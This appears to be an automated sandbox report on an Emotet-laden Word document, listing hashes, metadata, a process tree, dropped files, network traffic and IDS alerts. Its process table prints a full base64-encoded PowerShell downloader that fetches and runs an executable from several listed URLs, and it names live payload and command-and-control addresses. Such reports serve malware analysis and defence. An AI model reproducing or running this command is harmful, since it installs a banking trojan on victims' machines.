File name: | DAT_3868_143345323.doc |
Full analysis: | https://app.any.run/tasks/84d044d0-84c1-4eb1-8026-3c38a053e387 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | May 15, 2019, 11:19:52 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Street hacking, Subject: withdrawal, Author: Kaci Anderson, Comments: Barbados Dollar, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue May 14 09:52:00 2019, Last Saved Time/Date: Tue May 14 09:52:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 167, Security: 0 |
MD5: | 6B7AF530E6EC00C3F48DD8E76D383D18 |
SHA1: | D964C32D149DCBC6EB2001A8B9D08E527D168280 |
SHA256: | 56B9F6C0B0E06A06A9F25519343ACCDB00776206015FEEBBD8F2C7C2D35961F6 |
SSDEEP: | 3072:s77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qk6jX6g5MVReXzcu3qRZ:s77HUUUUUUUUUUUUUUUUUUUT52VKX6g4 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Manager: | Baumbach |
---|---|
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 195 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Rutherford - McClure |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 167 |
Words: | 29 |
Pages: | 1 |
ModifyDate: | 2019:05:14 08:52:00 |
CreateDate: | 2019:05:14 08:52:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | Barbados Dollar |
Keywords: | - |
Author: | Kaci Anderson |
Subject: | withdrawal |
Title: | Street hacking |
CompObjUserType: | Microsoft Word 97-2003 Document |
CompObjUserTypeLen: | 32 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
900 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DAT_3868_143345323.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3780 | powershell -enc JABjADYANwA5ADQANQA3ADYAPQAnAE0ANwA4ADgANwAwADIAMwAnADsAJABhADYAMAA4ADkAMAA2ACAAPQAgACcANQAzADEAJwA7ACQAUAA2ADcAMAA1ADQANwA9ACcAaAAxADEAMwAyADAAMAAnADsAJABJADMANwA1ADQANAA5AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABhADYAMAA4ADkAMAA2ACsAJwAuAGUAeABlACcAOwAkAEkAMAA5ADcAOQA0ADEAMAA9ACcAcAA3ADcAXwA4ADIAJwA7ACQAcQA3ADgANABfADQANAA9ACYAKAAnAG4AZQB3AC0AbwBiACcAKwAnAGoAJwArACcAZQBjAHQAJwApACAATgBgAGUAYABUAC4AdwBFAGIAYwBgAGwAYABJAGUATgB0ADsAJABsAF8ANwAzADIANgA9ACcAaAB0AHQAcABzADoALwAvAGsAcwBpAGMAYQByAGQAbwAuAGMAbwBtAC8AdAByAGEAdgBlAGwALwBuAHQASwBXAHoASQB5AEQAbAAvAEAAaAB0AHQAcAA6AC8ALwBpAGEAbQB6AGIALgBjAG8AbQAvAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQALwBzAHkAcwB0AGUAbQBfAHcAZQBiAC8ARwBBAEEAZgBSAFoATQBxAC8AQABoAHQAdABwADoALwAvAG0AYQBsAG8AbgBpAG4AYwAuAGMAbwBtAC8AYQBwAHAAcwAvAEcAYgBCAFoAbwBtAFEAagBTAC8AQABoAHQAdABwADoALwAvAGsAdQBtAGEAawB1AG4ALgBjAG8AbQAvADcAagBlAHQALwAzAGIAMgA0ADQANgA3ADIAegBlAF8AYgB0AHUAbQBuAGMAMABoAC0AMgAxADcAOAA4ADkANgAvAEAAaAB0AHQAcABzADoALwAvAGkAbgBnAGUAZwBuAGUAcgBpAGEAZABlAGwAdwBlAGIALgBjAG8AbQAvAGYAYQBuAHQAYQBjAGEAbABjAGkAbwAvADgANgAxADEAbABqAG8AbwBfAG8ANAB5ADAAMgAzAHcALQAzADcANQA0ADcAMAA0ADMANwAxAC8AJwAuAFMAUABMAEkAdAAoACcAQAAnACkAOwAkAHcAMABfADIAXwAzADMANAA9ACcAVQA2ADgAMQA5ADQANQAnADsAZgBvAHIAZQBhAGMAaAAoACQAVwBfADQANgA3ADEAMQA4ACAAaQBuACAAJABsAF8ANwAzADIANgApAHsAdAByAHkAewAkAHEANwA4ADQAXwA0ADQALgBEAG8AVwBuAEwAbwBBAGQARgBpAEwARQAoACQAVwBfADQANgA3ADEAMQA4ACwAIAAkAEkAMwA3ADUANAA0ADkAKQA7ACQAbgA4ADQAMAA3ADUANAA2AD0AJwBGADQAMgAwAF8AMAAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEkAMwA3ADUANAA0ADkAKQAuAEwAZQBuAEcAVABIACAALQBnAGUAIAAyADkANQAzADMAKQAgAHsALgAoACcASQBuAHYAJwArACcAbwBrAGUAJwArACcALQBJAHQAZQBtACcAKQAgACQASQAzADcANQA0ADQAOQA7ACQAcgA3ADQANgAyADYAPQAnAGkAOQAwADMANwAyADMAJwA7AGIAcgBlAGEAawA7ACQAaAAxADUAOAA4ADgAPQAnAEQAMwA0ADcAOAAzACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFIAOAAzADUAMwAzADUAPQAnAGoAOQAyADAANgAyACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3852 | "C:\Users\admin\531.exe" | C:\Users\admin\531.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Connection Manager Profile ikstaller Exit code: 0 Version: 7.02.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2000 | --5eb21af1 | C:\Users\admin\531.exe | 531.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Connection Manager Profile ikstaller Exit code: 0 Version: 7.02.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3268 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | 531.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Connection Manager Profile ikstaller Exit code: 0 Version: 7.02.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2232 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Connection Manager Profile ikstaller Exit code: 0 Version: 7.02.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1476 | "C:\Users\admin\AppData\Local\soundser\YoLNIAaNegPzeodKahu.exe" | C:\Users\admin\AppData\Local\soundser\YoLNIAaNegPzeodKahu.exe | — | soundser.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
1012 | --e9b0ff5 | C:\Users\admin\AppData\Local\soundser\YoLNIAaNegPzeodKahu.exe | YoLNIAaNegPzeodKahu.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2988 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | YoLNIAaNegPzeodKahu.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2524 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | — | soundser.exe |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
900 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR23A.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3780 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XLWY8CKU5D5J2JHFYLPN.temp | — | |
MD5:— | SHA256:— | |||
900 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\45E6BA1.wmf | wmf | |
MD5:A6811B5B145E1637A462F11CADAAE215 | SHA256:A9E16624EBA05B521D518F776FBCA07A1EA5C5C835C577920940452A1B154EE5 | |||
900 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3544F57.wmf | wmf | |
MD5:75D78358EC905502B0B5D28C566E0B26 | SHA256:70F5D5A0DA6ED3BE92DC1DFB82DA42069DBCCC28664FBEBB5D0318C3178A533F | |||
3780 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
900 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:47F3A78E1467E8957745E1AC91E9BAEA | SHA256:3C76FD6AFE51036046F9363210E96C75BF03E2B9958F898E00EFCBD018CED9BA | |||
900 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3F7F59DB.wmf | wmf | |
MD5:C549C19EBA4340F3FEE63536A3A1410F | SHA256:8AC65C26B25585966925135A5345FC6BB01265C2CAB73706CD180545690120F2 | |||
3780 | powershell.exe | C:\Users\admin\531.exe | executable | |
MD5:82BF7938B24C2C1476ED1AE0BF6E583C | SHA256:53A127FDC57F3C39B0FECA98C5B64919C28980D450FD701F3C839776B411B128 | |||
900 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5FB05594.wmf | wmf | |
MD5:C7FCA428D4596550781A53BB57724C40 | SHA256:A313D3411E084E1B7B1D7BEFBEE9CFB64C67B08F8511EE727381117DEAA9D5E7 | |||
900 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BDA7D220.wmf | wmf | |
MD5:2574B9847CB262CC9AD78E52CDEC1379 | SHA256:C116890E99E762EE5264E50288FCC42A2456CC9F4759D2ACD2C009BC3497E29C |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3780 | powershell.exe | GET | 200 | 184.168.27.40:80 | http://iamzb.com/aspnet_client/system_web/GAAfRZMq/ | US | executable | 118 Kb | suspicious |
2232 | soundser.exe | POST | 200 | 200.85.46.122:80 | http://200.85.46.122/nsip/loadan/ | PY | binary | 65.8 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2232 | soundser.exe | 200.85.46.122:80 | — | Telecel S.A. | PY | malicious |
3780 | powershell.exe | 184.168.27.40:80 | iamzb.com | GoDaddy.com, LLC | US | suspicious |
3780 | powershell.exe | 185.66.41.16:443 | ksicardo.com | — | ES | suspicious |
Domain | IP | Reputation |
---|---|---|
ksicardo.com |
| suspicious |
iamzb.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
3780 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3780 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3780 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2232 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |